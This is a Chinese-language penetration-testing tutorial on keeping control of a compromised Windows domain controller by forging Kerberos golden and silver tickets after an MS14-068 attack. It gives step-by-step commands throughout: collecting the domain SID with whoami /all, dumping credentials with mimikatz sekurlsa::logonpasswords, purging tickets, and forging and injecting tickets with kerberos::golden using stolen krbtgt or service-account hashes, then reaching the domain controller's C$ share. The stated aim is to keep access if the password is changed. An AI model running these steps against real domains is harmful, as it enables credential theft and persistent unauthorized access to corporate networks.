前言
在我们拿到域控账号密码后,为了防止密码被改,需要使用权限维持来维持我们取得的域控权限
域票据验证流程
1.首先将明文密码发送给AS服务器,AS服务器给我们一个TGT
2.拿着TGT去访问TGS服务器,TGS服务器给我们一个ST
3.使用获取到的ST访问对应的服务
域控权限维持-黄金票据
介绍
ms14068的漏洞原理是伪造域管的TGT,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
前提
ms-14-068票据伪造成功之后
过程
1.获取域名称:whoami获取后加上.com即可
2.获取域的SID值(去掉最后的-四位普通用户uid 即为域sid)
whoami /all
3.获取域的KRBTGT账户NTLM密码哈希或者aes-256值
见14068票据伪造里导出域hash,点此跳转
4.清理所有的票据
klist purge
5.使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden /admin:要伪造的用户名 /domain:域名 /sid:写sid /krbtgt:写krbtgt的hash值 /ptt
6.直接远程连接即可
dir \\dc\c$
域控权限维持-白银票据
介绍
白银票据与ms14068和黄金票据的原理不太一样,ms14068和黄金票据都是伪造tgt(门票发放票),而白银票据则是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等
前提
ms-14-068票据伪造成功之后
利用
1.获取域名:whoami获取后加上.com即可
2.获取域sid(去掉最后的-四位普通用户uid 即为域sid)
whoami /all
3.获取要攻击的目标服务器FQDN
net time /domain 获取域控名
4.利用文件共享服务cifs,并获取服务账号的NTMLHASH
在ms14068的基础上使用mimikatz抓取密码(域控名$即为服务账号)
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >2.txt
5.找一个要伪造的用户名
net user /domain
6.清理所有的票据
klist purge
7.使用mimikatz伪造指定用户的票据并注入内存
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
8.之后直接远程连接dc
dir \\dc\c$
